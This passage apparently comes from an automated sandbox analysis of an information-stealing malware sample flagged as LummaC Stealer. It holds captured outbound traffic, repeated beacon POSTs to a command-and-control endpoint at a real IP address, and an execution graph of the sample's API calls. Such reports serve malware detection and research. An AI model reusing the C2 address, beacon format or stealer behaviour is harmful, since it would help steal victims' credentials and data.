                                                                  Nov 13, 2024 10:52:54.238042116 CET7416OUTData Raw: d4 ff 51 9f f0 f4 fd 47 3b 8d 8f 1b a0 b4 41 5c 73 f5 08 c7 ea 05 d9 fe 0e 99 ba 09 8e 8a fc 0f 36 88 ba 3e de e7 1b ef 19 4e fa 1f df f3 cb fd 8f f7 f9 f2 c8 7a 3f d9 1b 8c fa 41 cc ea 23 ab a3 3e 5d 98 1d 8c 0f b5 80 e4 7f f0 3d be 17 98 6c 0f
                                                                  Data Ascii: QG;A\s6>Nz?A#>]=l}0?{1l_)yTZ\Hy39&kz2c:o5cnu\_svUVW6?&|M(
                                                                  Nov 13, 2024 10:52:54.238068104 CET4944OUTData Raw: cc c8 93 bf ae d4 93 65 83 bf ac d5 93 d1 03 9c e5 7f ad 7a 60 33 fe 97 af 2e d0 ed 83 cd f6 ff 92 e5 3d 7a 6a 25 4a 33 fe 57 bc 07 38 99 c5 3f ab b0 94 e0 81 3f a9 45 c9 ac 05 e4 2e f8 e3 4a 3d 65 59 20 d9 1f 7b 7d 24 78 95 79 98 5c 50 a6 14 03
                                                                  Data Ascii: ez`3.=zj%J3W8??E.J=eY {}$xy\PWYxR,N,#}AXakj<wY_Z\.`Rk*w_uf+|i;rx(>0}QLrK=K@}oz=_"<}U2
                                                                  Nov 13, 2024 10:52:54.242171049 CET2472OUTData Raw: b7 3e a7 0b f6 a8 ff 65 a6 0d fe 17 33 c0 1e f3 bf c2 06 38 84 fd 2f 8f 01 76 db ff bc 06 a8 fe a7 fe a7 fe d7 5a fd 5f 8b fe 67 a3 fe d7 b2 ff 49 fb 73 1a 60 97 fc cf 55 eb 57 c8 ff 8e 1a 8c 0c 30 d1 db 7b 58 2d d3 02 e7 1d 31 d2 6b 7f 74 2d ab
                                                                  Data Ascii: >e38/vZ_gIs`UW0{X-1kt-.#2:<7x/fD/z|~LGgN}"ktk,@[Ocr>{?X >#jR(_r=|+RM ?/svp'
                                                                  Nov 13, 2024 10:52:54.243056059 CET4944OUTData Raw: 3d ec 7f 19 0e a8 fe 37 34 fc 4f de af fe 57 92 ff 65 38 e0 5d 81 f1 a5 a7 96 9a 56 fd ef ae e3 06 87 9d ff c1 fe ba ed 7f 73 8f ac 66 ee ff c8 da ff 1b f9 9e 27 91 01 3a 8c 8f c2 5d 50 fa 5f cc 0c 3d 3d c0 c9 39 7e f1 3e 5f 5e ef c7 f7 85 a0 1e
                                                                  Data Ascii: =74OWe8]Vsf':]P_==9~>_^>_a "gR3l/^CPzC~`>`5Ugs8x/c({k]s:cCY+s[j
                                                                  Nov 13, 2024 10:52:54.243140936 CET4944OUTData Raw: 5a 3f 7a 25 cf a3 c0 f6 a8 36 10 3e 48 f7 d0 79 3a e6 26 c8 67 f3 65 f9 df 0d 62 a7 87 dc 05 8c 5d c1 b0 3e fe 39 7c 97 08 af 0d 84 f3 91 fb 51 2d a0 f4 3f d9 fb 8b d9 7f 98 0d d8 6b 26 36 dc fc 6f d5 aa 55 6d f3 3f b2 bf 47 2e 7a 4d 7b bf 47 0f
                                                                  Data Ascii: Z?z%6>Hy:&geb]>9|Q-?k&6oUm?G.zM{G_7PO#K_kSW??@V162cd`V5??(iG0OZz>oD|??>?~`
                                                                  Nov 13, 2024 10:52:54.243156910 CET2472OUTData Raw: b7 07 58 d8 1e 5c 0f ee 67 77 80 04 41 5f 30 05 fb 82 6f da bb 12 eb fb e5 b3 00 71 9e f7 fc 92 ff c1 00 b1 03 d8 e7 72 dc f0 a4 cb 61 8e 1f fa 79 71 8f dc f9 21 cf b9 ea 04 69 3e 20 af 09 e4 b3 05 ed 6e 62 b1 e7 57 3a 1f af ff 73 ed 02 96 de 27
                                                                  Data Ascii: X\gwA_0oqrayq!i> nbW:s']Pep09<__e{B/x8_QSSEK@&`5/p_>`JK\_.pzyYM


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.45001194.158.244.69801352C:\Users\user\Desktop\g1kWKm20Z5.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 13, 2024 10:53:03.009649038 CET188OUTPOST /c2sock HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                  User-Agent: TeslaBrowser/5.5
                                                                  Content-Length: 440
                                                                  Host: 94.158.244.69
                                                                  Nov 13, 2024 10:53:03.010031939 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                                  Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.45001294.158.244.69801352C:\Users\user\Desktop\g1kWKm20Z5.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 13, 2024 10:53:11.779273987 CET188OUTPOST /c2sock HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                  User-Agent: TeslaBrowser/5.5
                                                                  Content-Length: 440
                                                                  Host: 94.158.244.69
                                                                  Nov 13, 2024 10:53:11.779647112 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                                  Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.45001394.158.244.69801352C:\Users\user\Desktop\g1kWKm20Z5.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 13, 2024 10:53:20.672610998 CET188OUTPOST /c2sock HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                  User-Agent: TeslaBrowser/5.5
                                                                  Content-Length: 440
                                                                  Host: 94.158.244.69
                                                                  Nov 13, 2024 10:53:20.672972918 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                                  Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.45001494.158.244.69801352C:\Users\user\Desktop\g1kWKm20Z5.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 13, 2024 10:53:29.417304039 CET188OUTPOST /c2sock HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                  User-Agent: TeslaBrowser/5.5
                                                                  Content-Length: 440
                                                                  Host: 94.158.244.69
                                                                  Nov 13, 2024 10:53:29.418088913 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                                  Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.45001594.158.244.69801352C:\Users\user\Desktop\g1kWKm20Z5.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 13, 2024 10:53:38.222455978 CET188OUTPOST /c2sock HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                  User-Agent: TeslaBrowser/5.5
                                                                  Content-Length: 440
                                                                  Host: 94.158.244.69
                                                                  Nov 13, 2024 10:53:38.223850965 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                                  Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.45001694.158.244.69801352C:\Users\user\Desktop\g1kWKm20Z5.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 13, 2024 10:53:46.989612103 CET188OUTPOST /c2sock HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                  User-Agent: TeslaBrowser/5.5
                                                                  Content-Length: 440
                                                                  Host: 94.158.244.69
                                                                  Nov 13, 2024 10:53:46.989995003 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                                  Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:04:51:02
                                                                  Start date:13/11/2024
                                                                  Path:C:\Users\user\Desktop\g1kWKm20Z5.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\g1kWKm20Z5.exe"
                                                                  Imagebase:0x400000
                                                                  File size:440'832 bytes
                                                                  MD5 hash:33F4CF8B4C1F6C07E80C74669D31021B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3612871914.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1693318740.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3613161605.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:04:53:55
                                                                  Start date:13/11/2024
                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 1708
                                                                  Imagebase:0xb10000
                                                                  File size:483'680 bytes
                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:3.9%
                                                                    Dynamic/Decrypted Code Coverage:10.1%
                                                                    Signature Coverage:52.4%
                                                                    Total number of Nodes:773
                                                                    Total number of Limit Nodes:25
                                                                    execution_graph 72029 4102d1 72032 447a80 72029->72032 72035 44e224 72032->72035 72036 4102da 72035->72036 72037 44e22f RtlFreeHeap 72035->72037 72037->72036 72038 44e244 GetLastError 72037->72038 72039 44e251 __dosmaperr 72038->72039 72041 4447a4 14 API calls __dosmaperr 72039->72041 72041->72036 72042 4069a1 72060 4069ba CallUnexpected 72042->72060 72043 406aed lstrcatW lstrcatW 72043->72060 72044 407722 lstrcatW lstrcatW 72044->72060 72045 405aaa 178 API calls 72045->72060 72048 40738c 72049 408a5a lstrcatW lstrcatW 72061 40e14e 72049->72061 72052 408a43 72081 404710 46 API calls 72052->72081 72055 40620b 166 API calls 72055->72060 72059 4360e1 15 API calls 72059->72060 72060->72043 72060->72044 72060->72045 72060->72048 72060->72049 72060->72052 72060->72055 72060->72059 72075 403ead 46 API calls _strlen 72060->72075 72076 4034bc 46 API calls 72060->72076 72077 403d1e 46 API calls 72060->72077 72078 40476b 99 API calls 72060->72078 72079 404710 46 API calls 72060->72079 72080 4034fd 101 API calls 72060->72080 72074 40e172 CallUnexpected 72061->72074 72062 408a85 72064 40e14e 155 API calls 72064->72074 72065 40b81c 43 API calls 72065->72074 72066 40f53e lstrcatW lstrcatW lstrcatW 72066->72074 72068 447a80 14 API calls ___std_exception_copy 72068->72074 72070 40e7bc lstrcatW 72071 40e14e 155 API calls 72070->72071 72071->72074 72072 40d994 155 API calls 72072->72074 72073 40e54f lstrcatW lstrcatW 72073->72074 72074->72062 72074->72064 72074->72065 72074->72066 72074->72068 72074->72070 72074->72072 72074->72073 72082 40b129 72074->72082 72094 438e28 72074->72094 72102 419e6b 72074->72102 72075->72060 72076->72060 72077->72060 72078->72060 72079->72060 72080->72060 72081->72049 72092 40b13c CallUnexpected 72082->72092 72083 40b494 72084 40a928 41 API calls 72084->72092 72085 40b81c 41 API calls 72085->72092 72086 40b759 NtReadFile 72088 438e28 3 API calls 72086->72088 72087 40b129 41 API calls 72087->72092 72091 40b7ab NtClose 72088->72091 72089 438e28 LoadLibraryW GetPEB lstrcmpiW 72089->72092 72091->72074 72092->72083 72092->72084 72092->72085 72092->72086 72092->72087 72092->72089 72093 447e24 15 API calls ___std_exception_copy 72092->72093 72110 40b7bb 72092->72110 72093->72092 72099 438e45 72094->72099 72095 43935b LoadLibraryW 72095->72099 72096 439535 GetPEB lstrcmpiW 72096->72099 72097 43a4fe GetPEB lstrcmpiW 72097->72099 72098 439136 72098->72074 72099->72095 72099->72096 72099->72097 72099->72098 72100 43b362 GetPEB lstrcmpiW 72099->72100 72101 438e28 GetPEB lstrcmpiW 72099->72101 72100->72099 72101->72099 72103 419e88 72102->72103 72105 41a1d4 72103->72105 72166 418b8f 72103->72166 72169 41831a 119 API calls _wctomb_s 72103->72169 72170 419496 106 API calls 3 library calls 72103->72170 72171 4137c1 16 API calls 2 library calls 72103->72171 72172 41900a 46 API calls 2 library calls 72103->72172 72105->72074 72116 40a928 72110->72116 72113 40b812 72113->72092 72114 438e28 3 API calls 72115 40b807 NtClose 72114->72115 72115->72113 72117 40a941 CallUnexpected 72116->72117 72118 438e28 3 API calls 72117->72118 72128 40a956 CallUnexpected 72118->72128 72119 40b02e lstrcatW lstrlenW 72119->72128 72120 40af6b NtCreateFile 72125 438e28 3 API calls 72120->72125 72121 40ac51 lstrlenW 72121->72128 72122 40acba lstrcatW 72122->72128 72123 438e28 3 API calls 72123->72128 72125->72128 72126 40b129 38 API calls 72126->72128 72127 40ae4c 72127->72113 72127->72114 72128->72119 72128->72120 72128->72121 72128->72122 72128->72123 72128->72126 72128->72127 72129 40a928 38 API calls 72128->72129 72130 40b7bb 38 API calls 72128->72130 72131 40b81c 72128->72131 72129->72128 72130->72128 72156 40b835 __fread_nolock CallUnexpected 72131->72156 72132 40d120 NtQueryDirectoryFile 72132->72156 72133 40d6a1 lstrcmpW 72133->72156 72134 40d7fe lstrlenW 72134->72156 72135 40d817 lstrlenW 72135->72156 72136 40d3c0 lstrcmpW 72136->72156 72137 40d891 lstrcmpW 72137->72156 72138 438e28 3 API calls 72148 40cced NtCreateFile 72138->72148 72139 40c3a9 lstrcmpW 72139->72156 72140 40c57e lstrlenW 72140->72156 72141 438e28 3 API calls 72149 40d547 NtClose 72141->72149 72142 438e28 LoadLibraryW GetPEB lstrcmpiW 72142->72156 72143 40cc06 lstrcatW lstrcatW 72143->72156 72144 40c8cc lstrcmpW 72144->72156 72145 40c8fe lstrlenW 72145->72156 72146 40cdde lstrcatW 72146->72156 72147 40b81c 26 API calls 72147->72156 72148->72156 72149->72156 72150 40d352 72150->72128 72152 40c415 lstrcatW lstrcatW 72152->72156 72153 40b129 26 API calls 72153->72156 72154 40a928 26 API calls 72154->72156 72155 40b7bb 26 API calls 72155->72156 72156->72132 72156->72133 72156->72134 72156->72135 72156->72136 72156->72137 72156->72138 72156->72139 72156->72140 72156->72141 72156->72142 72156->72143 72156->72144 72156->72145 72156->72146 72156->72147 72156->72150 72156->72152 72156->72153 72156->72154 72156->72155 72157 447e24 72156->72157 72162 44eb6f __dosmaperr 72157->72162 72158 44ebad 72165 4447a4 14 API calls __dosmaperr 72158->72165 72159 44eb98 RtlAllocateHeap 72161 44ebab 72159->72161 72159->72162 72161->72156 72162->72158 72162->72159 72164 44e560 EnterCriticalSection LeaveCriticalSection __dosmaperr 72162->72164 72164->72162 72165->72161 72173 418ba2 72166->72173 72168 418b9e 72168->72103 72169->72103 72170->72103 72171->72103 72172->72103 72174 418bb9 _strlen 72173->72174 72185 418c73 72173->72185 72175 447a80 ___std_exception_copy 14 API calls 72174->72175 72176 418bfe 72174->72176 72174->72185 72175->72176 72178 418c33 72176->72178 72181 418cf3 72176->72181 72176->72185 72177 418c68 72180 447a80 ___std_exception_copy 14 API calls 72177->72180 72177->72185 72178->72177 72191 415039 46 API calls 72178->72191 72180->72185 72181->72177 72186 44614f GetSystemTimeAsFileTime 72181->72186 72183 418e08 72188 417099 72183->72188 72185->72168 72187 446188 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 72186->72187 72187->72183 72192 44575f 72188->72192 72190 4170be 72190->72177 72191->72177 72193 44576a 72192->72193 72194 44578d 72193->72194 72195 44577a 72193->72195 72197 44579f 72194->72197 72206 4457b2 72194->72206 72238 4447a4 14 API calls __dosmaperr 72195->72238 72240 4447a4 14 API calls __dosmaperr 72197->72240 72199 44577f 72239 44e2f7 29 API calls __fread_nolock 72199->72239 72200 4457a4 72241 44e2f7 29 API calls __fread_nolock 72200->72241 72201 4457d2 72242 4447a4 14 API calls __dosmaperr 72201->72242 72202 4457e3 72230 453aae 72202->72230 72206->72201 72206->72202 72210 4457fa 72211 4459ee 72210->72211 72250 45373d 72210->72250 72269 44e307 11 API calls CallUnexpected 72211->72269 72214 4459f8 72215 44580c 72215->72211 72257 453769 72215->72257 72217 44581e 72217->72211 72218 445827 72217->72218 72219 4458ac 72218->72219 72221 445848 72218->72221 72267 4537d0 29 API calls 3 library calls 72219->72267 72264 4537d0 29 API calls 3 library calls 72221->72264 72222 4458b3 72229 445789 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 72222->72229 72268 453a5a 29 API calls 2 library calls 72222->72268 72224 445860 72224->72229 72265 453a5a 29 API calls 2 library calls 72224->72265 72227 445879 72227->72229 72266 4537d0 29 API calls 3 library calls 72227->72266 72229->72190 72231 453aba ___scrt_is_nonwritable_in_current_image 72230->72231 72232 4457e8 72231->72232 72270 44d13d EnterCriticalSection 72231->72270 72243 453711 72232->72243 72234 453acb 72237 453adf 72234->72237 72271 453ff7 72234->72271 72283 453b02 LeaveCriticalSection CallUnexpected 72237->72283 72238->72199 72239->72229 72240->72200 72241->72229 72242->72229 72244 453732 72243->72244 72245 45371d 72243->72245 72244->72210 72346 4447a4 14 API calls __dosmaperr 72245->72346 72247 453722 72347 44e2f7 29 API calls __fread_nolock 72247->72347 72249 45372d 72249->72210 72251 45375e 72250->72251 72252 453749 72250->72252 72251->72215 72348 4447a4 14 API calls __dosmaperr 72252->72348 72254 45374e 72349 44e2f7 29 API calls __fread_nolock 72254->72349 72256 453759 72256->72215 72258 453775 72257->72258 72259 45378a 72257->72259 72350 4447a4 14 API calls __dosmaperr 72258->72350 72259->72217 72261 45377a 72351 44e2f7 29 API calls __fread_nolock 72261->72351 72263 453785 72263->72217 72264->72224 72265->72227 72266->72229 72267->72222 72268->72229 72269->72214 72270->72234 72284 453b0b 72271->72284 72274 454053 72302 453bc4 72274->72302 72275 45404a 72296 453d65 72275->72296 72278 454050 72279 44e224 __freea 14 API calls 72278->72279 72280 45405e 72279->72280 72325 43d298 5 API calls ___raise_securityfailure 72280->72325 72282 45406b 72282->72237 72283->72232 72326 45af54 72284->72326 72289 453b52 72292 44e224 __freea 14 API calls 72289->72292 72290 45af54 42 API calls 72291 453b6a 72290->72291 72291->72289 72293 453b74 72291->72293 72294 453b31 72292->72294 72295 44e224 __freea 14 API calls 72293->72295 72294->72274 72294->72275 72295->72294 72297 453d75 72296->72297 72298 453769 29 API calls 72297->72298 72299 453d96 72298->72299 72341 44e307 11 API calls CallUnexpected 72299->72341 72301 453ff6 72303 453bd4 72302->72303 72304 453769 29 API calls 72303->72304 72305 453bf1 72304->72305 72306 453d13 72305->72306 72308 453711 29 API calls 72305->72308 72345 44e307 11 API calls CallUnexpected 72306->72345 72310 453c03 72308->72310 72309 453d1d 72310->72306 72311 45373d 29 API calls 72310->72311 72312 453c15 72311->72312 72312->72306 72313 453c1e 72312->72313 72314 44e224 __freea 14 API calls 72313->72314 72315 453c29 GetTimeZoneInformation 72314->72315 72316 453c45 72315->72316 72317 453cf0 72315->72317 72318 453c79 __fread_nolock 72316->72318 72317->72278 72342 4512d8 41 API calls 2 library calls 72318->72342 72320 453cc8 72343 453b82 43 API calls 4 library calls 72320->72343 72322 453cd9 72344 453b82 43 API calls 4 library calls 72322->72344 72324 453ced 72324->72317 72325->72282 72327 45af5f ___scrt_is_nonwritable_in_current_image 72326->72327 72328 44d13d CallUnexpected EnterCriticalSection 72327->72328 72329 45af76 72328->72329 72330 45b042 42 API calls 72329->72330 72331 45af8c 72330->72331 72332 45afb5 LeaveCriticalSection 72331->72332 72333 453b2a 72332->72333 72333->72294 72334 44eb6f 72333->72334 72335 44ebad 72334->72335 72340 44eb7d __dosmaperr 72334->72340 72337 4447a4 __dosmaperr 14 API calls 72335->72337 72336 44eb98 RtlAllocateHeap 72338 44ebab 72336->72338 72336->72340 72337->72338 72338->72289 72338->72290 72339 44e560 __dosmaperr EnterCriticalSection LeaveCriticalSection 72339->72340 72340->72335 72340->72336 72340->72339 72341->72301 72342->72320 72343->72322 72344->72324 72345->72309 72346->72247 72347->72249 72348->72254 72349->72256 72350->72261 72351->72263 72352 43c910 72353 43c91c ___scrt_is_nonwritable_in_current_image 72352->72353 72378 43cbbb 72353->72378 72355 43c923 72356 43ca76 72355->72356 72367 43c94d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 72355->72367 72401 43ce95 4 API calls 2 library calls 72356->72401 72358 43ca7d 72394 443854 72358->72394 72362 43ca8b 72363 43c96c 72364 43c9ed 72386 43ce0e GetStartupInfoW __fread_nolock 72364->72386 72366 43c9f3 72387 42f1a8 72366->72387 72367->72363 72367->72364 72397 44389e 41 API calls 3 library calls 72367->72397 72372 43ca0f 72372->72358 72373 43ca13 72372->72373 72374 43ca1c 72373->72374 72399 443880 23 API calls CallUnexpected 72373->72399 72400 43cbf4 77 API calls ___scrt_uninitialize_crt 72374->72400 72377 43ca24 72377->72363 72379 43cbc4 72378->72379 72403 43d0b8 IsProcessorFeaturePresent 72379->72403 72381 43cbd0 72404 43d5c2 10 API calls 2 library calls 72381->72404 72383 43cbd5 72384 43cbd9 72383->72384 72405 43d5e1 7 API calls 2 library calls 72383->72405 72384->72355 72386->72366 72388 42f1ad 72387->72388 72406 4244e4 GetPEB 72388->72406 72410 42d658 72388->72410 72435 4245ec 72388->72435 72444 422177 72388->72444 72389 42f1bd 72398 43ce3f GetModuleHandleW 72389->72398 72815 443a0a 72394->72815 72397->72364 72398->72372 72399->72374 72400->72377 72401->72358 72402 44386a 23 API calls CallUnexpected 72402->72362 72403->72381 72404->72383 72405->72384 72407 424502 72406->72407 72409 4245d2 NtSetInformationThread 72407->72409 72452 4279e0 72407->72452 72409->72389 72433 42d66d 72410->72433 72411 42f19d 72411->72389 72413 42d658 281 API calls 72413->72433 72414 422177 58 API calls 72414->72433 72415 4360e1 15 API calls 72415->72433 72417 41a28f 182 API calls 72417->72433 72420 419b9d 72 API calls 72420->72433 72421 4244e4 3 API calls 72421->72433 72423 42f1c2 GetPEB NtClose GetPEB 72423->72433 72424 4269e4 GetPEB GetPEB 72424->72433 72426 4245ec 58 API calls 72426->72433 72428 42f265 GetPEB 72428->72433 72429 40e14e 161 API calls 72429->72433 72433->72411 72433->72413 72433->72414 72433->72415 72433->72417 72433->72420 72433->72421 72433->72423 72433->72424 72433->72426 72433->72428 72433->72429 72457 402fcc LoadLibraryA LoadLibraryA 72433->72457 72467 401ff9 72433->72467 72478 402476 72433->72478 72491 430228 72433->72491 72504 436adc 72433->72504 72521 434080 72433->72521 72537 433c10 72433->72537 72547 421eeb 72433->72547 72553 4224a3 72433->72553 72559 42cfba 72433->72559 72570 4262a1 72433->72570 72442 424605 72435->72442 72436 4247ff NtQuerySystemInformation 72436->72442 72437 4247b0 GetPEB 72437->72442 72438 4224a3 GetPEB NtQueryInformationProcess GetPEB 72438->72442 72439 4262a1 56 API calls 72439->72442 72440 4279e0 GetPEB 72440->72442 72441 424980 72441->72389 72442->72436 72442->72437 72442->72438 72442->72439 72442->72440 72442->72441 72443 422177 56 API calls 72442->72443 72443->72442 72445 422191 72444->72445 72446 422398 NtQueryInformationProcess 72445->72446 72447 42245b GetPEB 72445->72447 72448 4279e0 GetPEB 72445->72448 72451 422491 72445->72451 72813 41f916 GetPEB VirtualQuery 72445->72813 72814 41ebeb 58 API calls 72445->72814 72446->72445 72447->72445 72448->72445 72451->72389 72453 4279fe 72452->72453 72455 428317 72453->72455 72456 428334 GetPEB 72453->72456 72455->72407 72456->72453 72459 402ff9 72457->72459 72458 402fcc 6 API calls 72463 403349 72458->72463 72460 4033ee 72459->72460 72461 402fcc 6 API calls 72459->72461 72459->72463 72464 401ff9 6 API calls 72459->72464 72466 402476 6 API calls 72459->72466 72460->72433 72461->72459 72462 40112c 6 API calls 72462->72463 72463->72458 72463->72459 72463->72462 72587 40112c 8 API calls __aullrem 72463->72587 72464->72459 72466->72459 72468 40200e 72467->72468 72469 401c1e 6 API calls 72468->72469 72470 402426 ExitProcess 72468->72470 72471 402083 72468->72471 72472 402fcc 6 API calls 72468->72472 72475 402221 72468->72475 72588 401c1e 72468->72588 72469->72468 72471->72468 72473 40112c 6 API calls 72471->72473 72472->72468 72473->72471 72475->72433 72476 4020ce Sleep 72477 401c1e 6 API calls 72476->72477 72477->72468 72488 402482 72478->72488 72479 402be1 GetUserNameW 72479->72488 72480 401ff9 6 API calls 72480->72488 72481 402af0 GetComputerNameW 72481->72488 72482 402476 6 API calls 72487 402555 72482->72487 72483 40112c 6 API calls 72483->72487 72484 402fcc 6 API calls 72484->72488 72485 401ff9 6 API calls 72485->72487 72486 402b69 72486->72433 72486->72486 72487->72482 72487->72483 72487->72485 72487->72488 72488->72479 72488->72480 72488->72481 72488->72484 72488->72486 72488->72487 72489 402476 6 API calls 72488->72489 72490 401c1e 6 API calls 72488->72490 72489->72488 72490->72488 72498 43023b CallUnexpected 72491->72498 72492 4309a8 72492->72433 72493 430228 206 API calls 72493->72498 72494 42f278 206 API calls 72494->72498 72495 447e24 ___std_exception_copy 15 API calls 72495->72498 72496 42f625 206 API calls 72496->72498 72497 438e28 3 API calls 72497->72498 72498->72492 72498->72493 72498->72494 72498->72495 72498->72496 72498->72497 72499 40b81c 43 API calls 72498->72499 72500 42fd35 206 API calls 72498->72500 72501 447a80 ___std_exception_copy 